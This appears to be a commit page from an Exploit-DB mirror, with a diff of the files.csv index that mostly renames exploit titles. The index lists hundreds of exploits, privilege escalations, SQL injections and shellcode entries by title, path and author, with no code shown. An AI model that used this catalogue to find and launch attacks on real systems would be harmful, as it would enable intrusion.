bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2016-03-29

Browse source 
9 new exploits

Serv-U 3x - 5.x - Local Privilege Escalation Exploit
Serv-U 3.x - 5.x - Local Privilege Escalation Exploit

SHOUTcast 1.9.4 File Request Format String Remote Exploit (win)
SHOUTcast 1.9.4 - File Request Format String Remote Exploit (Windows)

Monstra CMS 3.0.3 - Multiple Vulnerabilities
pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (win)
GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (win)
pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)
GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)

PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)
PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (Windows)

Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (win)
Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (Windows)

Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (win)
Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (Windows)

AJA Portal 1.2 - Local File Inclusion Vulnerabilities (win)
AJA Portal 1.2 - Local File Inclusion Vulnerabilities (Windows)

Microsoft Internet Explorer 7 (Windows 2003 SP2)  - Memory Corruption PoC (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)

XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)
XBMC 8.10 - (GET Request) Remote Buffer Overflow Exploit (Windows)

MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)
MonGoose 2.4 - Webserver Directory Traversal Vulnerability (Windows)

Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)
Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (Windows)

Adobe Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation
Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation

PulseAudio setuid - Local Privilege Escalation Exploit

Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit
Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (C)

Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit (py)
Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (Python)

Serv-u Web client 9.0.0.5 - Buffer Overflow
Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)

Serv-u Web client 9.0.0.5 - Buffer Overflow
Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)

Qihoo 360 Security Guard breg device drivers Privilege Escalation Vulnerability
Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation Vulnerability

Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities
Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands DoS Vulnerabilities

Integard Pro 2.2.0.9026 - Windows 7 ROP-Code  (Metasploit)
Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)

WordPress Plugin mingle forum  <= 1.0.26 - Multiple Vulnerabilities
WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities

Microsoft Windows Server  - Service Relative Path Stack Corruption (MS08-067)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)

WordPress Plugin ajax category dropdown  0.1.5 - Multiple Vulnerabilities
WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities

Sysax Multi Server 5.50 Create Folder BOF
Sysax Multi Server 5.50 - Create Folder BOF

Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)
Sysax Multi Server <= 5.52 - File Rename BoF RCE (Egghunter)
Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit
Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)
Sysax Multi Server 5.53 - SFTP Post Auth SEH Exploit
Sysax <= 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)

Sysax 5.53 SSH Username Buffer Overflow (Metasploit)
Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)

sysax <= 5.57 - Directory Traversal
Sysax <= 5.57 - Directory Traversal

Sysax <= 5.60 Create SSL Certificate Buffer Overflow
Sysax <= 5.60 - Create SSL Certificate Buffer Overflow

Sysax <= 5.62 Admin Interface Local Buffer Overflow
Sysax <= 5.62 - Admin Interface Local Buffer Overflow

Sysax Multi-Server 5.64 Create Folder Buffer Overflow

Sysax Multi Server 5.64 Create Folder Buffer Overflow
Sysax Multi Server 5.64 - Create Folder Buffer Overflow

ActFax 4.31 - Local Privilege Escalation Exploit
ActFax Server 4.31 Build 0225 - Local Privilege Escalation Exploit

PHP-Nuke  Search Module - Modules.PHP Remote Directory Traversal Vulnerability
PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability
STHS v2 Web Portal prospects.php team Parameter SQL Injection
STHS v2 Web Portal prospect.php team Parameter SQL Injection
STHS v2 Web Portal team.php team Parameter SQL Injection
STHS v2 Web Portal - prospects.php team Parameter SQL Injection
STHS v2 Web Portal - prospect.php team Parameter SQL Injection
STHS v2 Web Portal - team.php team Parameter SQL Injection

WK UDID v1.0.1 iOS - Command Inject Vulnerability
WK UDID 1.0.1 iOS - Command Inject Vulnerability

Hawkeye-G v3.0.1.4912 CSRF Vulnerability
Hawkeye-G 3.0.1.4912 - CSRF Vulnerability

Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage
Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage

Reaver Pro Local Privilege Escalation Vulnerability
Reaver Pro - Local Privilege Escalation Vulnerability

Sysax Multi Server 6.40  SSH Component Denial of Service
Sysax Multi Server 6.40 - SSH Component Denial of Service

WordPress CP Reservation Calendar Plugin 1.1.6  - SQL Injection
WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection

w3tw0rk / Pitbul IRC Bot  Remote Code Execution
w3tw0rk / Pitbul IRC Bot - Remote Code Execution

Dropbox < 3.3.x  - OSX FinderLoadBundle Local Root Exploit
Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit

Hitron Router CGN3ACSMR 4.5.8.16  - Arbitrary Code Execution
Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution
WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities
WordPress Plugin Sell Download v1.0.16  - Local File Disclosure
WordPress Plugin TheCartPress v1.4.7  - Multiple Vulnerabilities
WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities
WordPress Plugin Sell Download 1.0.16 - Local File Disclosure
WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities

Cyclope Employee Surveillance  <= v8.6.1- Insecure File Permissions
Cyclope Employee Surveillance <= 8.6.1- Insecure File Permissions

XM Easy Personal FTP Server 5.8 - (HELP)  Remote DoS Vulnerability
XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability

Liferay Portal 5.1.2 - Persistent XSS

Trend Micro Deep Discovery Inspector 3.8_ 3.7 - CSRF Vulnerabilities
Linux/x86_x64 - execve(/bin/sh) - 25 bytes
Linux/x86_x64 - execve(/bin/bash) - 33 bytes
TallSoft SNMP TFTP Server 1.0.0 - Denial of Service
FireEye - Privilege Escalation to root from Malware Input Processor (uid=mip)
Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation
Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege
This commit is contained in:
Offensive Security 2016-03-29 05:02:00 +00:00
parent 2467f523e2
commit 67cc75a29b
12 changed files with 990 additions and 259 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

114
files.csv
View file

@ -354,7 +354,7 @@ id,file,description,date,author,platform,type,port
378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21
379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,N/A,linux,remote,0
380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80
381,platforms/windows/local/381.c,"Serv-U 3x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0
381,platforms/windows/local/381.c,"Serv-U 3.x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0
382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0
383,platforms/multiple/dos/383.c,"psyBNC <= 2.3 - Denial of Service Exploit",2002-05-19,"Lunar Fault",multiple,dos,31337
384,platforms/php/webapps/384.txt,"PHP (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0
@ -652,7 +652,7 @@ id,file,description,date,author,platform,type,port
827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP Unauthorized _USER_ Remote BoF Exploit",2005-02-18,class101,windows,remote,21
828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617
829,platforms/hardware/remote/829.c,"Thomson TCW690 POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80
830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 File Request Format String Remote Exploit (win)",2005-02-19,mandragore,windows,remote,8000
830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 - File Request Format String Remote Exploit (Windows)",2005-02-19,mandragore,windows,remote,8000
831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit",2005-02-20,jsk,linux,remote,5803
832,platforms/php/webapps/832.txt,"vBulletin <= 3.0.6 php Code Injection",2005-02-22,pokley,php,webapps,0
833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0
@ -3064,6 +3064,7 @@ id,file,description,date,author,platform,type,port
3395,platforms/windows/remote/3395.c,"WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC",2007-03-01,cybermind,windows,remote,0
3396,platforms/linux/dos/3396.php,"PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",2007-03-02,"Stefan Esser",linux,dos,0
3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143
39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80
3398,platforms/php/webapps/3398.txt,"Mani Stats Reader <= 1.2 (ipath) Remote File Include Vulnerability",2007-03-02,mozi,php,webapps,0
3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0
3400,platforms/php/webapps/3400.pl,"webSPELL <= 4.01.02 - Multiple Remote SQL Injection Exploit",2007-03-02,DNX,php,webapps,0
@ -3183,8 +3184,8 @@ id,file,description,date,author,platform,type,port
3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0
3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability",2007-03-19,"Mehmet Ince",php,webapps,0
3520,platforms/asp/webapps/3520.txt,"NetVios Portal (page.asp) Remote SQL Injection Vulnerability",2007-03-19,parad0x,asp,webapps,0
3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (win)",2007-03-19,bd0rk,php,webapps,0
3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (win)",2007-03-20,GoLd_M,php,webapps,0
3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0
3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0
3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln",2007-03-20,"Cold Zero",php,webapps,0
3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0
@ -5313,7 +5314,7 @@ id,file,description,date,author,platform,type,port
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (Windows)",2008-05-29,gmda,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
@ -6451,7 +6452,7 @@ id,file,description,date,author,platform,type,port
6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability",2008-10-31,ZoRLu,php,webapps,0
6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (beta) Insecure Cookie Handling Vulnerability",2008-10-31,ZoRLu,php,webapps,0
6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b Remote File Inclusion Vulnerability",2008-10-31,w0cker,php,webapps,0
6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (win)",2008-10-31,GoLd_M,php,webapps,0
6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (Windows)",2008-10-31,GoLd_M,php,webapps,0
6889,platforms/php/webapps/6889.txt,"Absolute Content Rotator 6.0 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0
6890,platforms/php/webapps/6890.txt,"Absolute Banner Manager Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0
6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0
@ -6810,7 +6811,7 @@ id,file,description,date,author,platform,type,port
7261,platforms/php/webapps/7261.txt,"Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability",2008-11-28,"CWH Underground",php,webapps,0
7262,platforms/windows/dos/7262.pl,"Microsoft Office Communicator (SIP) Remote Denial of Service Exploit",2008-11-28,"Praveen Darshanam",windows,dos,0
7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability",2008-11-28,MrDoug,php,webapps,0
7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (win)",2008-11-28,Abysssec,windows,local,0
7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (Windows)",2008-11-28,Abysssec,windows,local,0
7265,platforms/php/webapps/7265.txt,"web calendar system <= 3.40 (xss/SQL) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0
7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability",2008-11-28,JIKO,php,webapps,0
@ -7470,7 +7471,7 @@ id,file,description,date,author,platform,type,port
7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0
7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 (rfi/XSS) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0
7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0
7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (win)",2009-02-02,ahmadbady,php,webapps,0
7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (Windows)",2009-02-02,ahmadbady,php,webapps,0
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0
@ -7607,7 +7608,7 @@ id,file,description,date,author,platform,type,port
8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0
8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0
8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0
8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0
8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
@ -7848,7 +7849,7 @@ id,file,description,date,author,platform,type,port
8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0
8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit",2009-04-01,"Guido Landi",windows,remote,0
8337,platforms/multiple/dos/8337.c,"XBMC 8.10 (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0
8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)",2009-04-01,n00b,windows,remote,80
8338,platforms/windows/remote/8338.py,"XBMC 8.10 - (GET Request) Remote Buffer Overflow Exploit (Windows)",2009-04-01,n00b,windows,remote,80
8339,platforms/windows/remote/8339.py,"XBMC 8.10 (takescreenshot) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80
8340,platforms/windows/remote/8340.py,"XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80
8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability",2009-04-01,cOndemned,php,webapps,0
@ -7935,7 +7936,7 @@ id,file,description,date,author,platform,type,port
8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 (rfi/sqli/cb/XSS) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0
8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - (.m3u) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0
8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0
8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)",2009-04-14,e.wiZz!,windows,remote,0
8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 - Webserver Directory Traversal Vulnerability (Windows)",2009-04-14,e.wiZz!,windows,remote,0
8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service Exploit",2009-04-14,ksa04,multiple,dos,0
8430,platforms/openbsd/dos/8430.py,"OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0
8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability",2009-04-14,SirGod,php,webapps,0
@ -8427,7 +8428,7 @@ id,file,description,date,author,platform,type,port
8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0
8932,platforms/php/webapps/8932.txt,"yogurt 0.3 (xss/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0
8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0
8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (Windows)",2009-06-12,ryujin,windows,remote,0
8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0
8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0
8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0
@ -8679,14 +8680,14 @@ id,file,description,date,author,platform,type,port
9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0
9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
9199,platforms/windows/local/9199.txt,"Adobe Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0
9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0
9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0
9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln",2009-07-20,Bgh7,php,webapps,0
9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass Vulnerability",2009-07-20,Mr.tro0oqy,php,webapps,0
9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0
9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
9207,platforms/windows/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,linux,local,0
9208,platforms/linux/local/9208.txt,"PulseAudio setuid - Local Privilege Escalation Vulnerability (Ubuntu 9.04 & Slackware 12.2.0)",2009-07-20,N/A,linux,local,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT (httpd service) Remote Command Execution Vulnerability",2009-07-20,gat3way,hardware,remote,0
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
@ -8700,7 +8701,7 @@ id,file,description,date,author,platform,type,port
9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 - (.srt) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0
9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0
9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0
9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0
9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (C)",2009-07-21,"Jeremy Brown",windows,local,0
9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection Vulnerability",2009-07-21,n3w7u,php,webapps,0
9226,platforms/php/webapps/9226.txt,"phpdirectorysource (xss/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0
@ -8746,7 +8747,7 @@ id,file,description,date,author,platform,type,port
9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0
9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0
9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL Injection Vulnerability",2009-07-27,boom3rang,php,webapps,0
9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit (py)",2009-07-27,Dr_IDE,windows,local,0
9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (Python)",2009-07-27,Dr_IDE,windows,local,0
9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0
9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0
9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0
@ -9192,7 +9193,7 @@ id,file,description,date,author,platform,type,port
9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0
9800,platforms/windows/remote/9800.cpp,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80
9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion Vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0
9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0
@ -9343,7 +9344,7 @@ id,file,description,date,author,platform,type,port
9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0
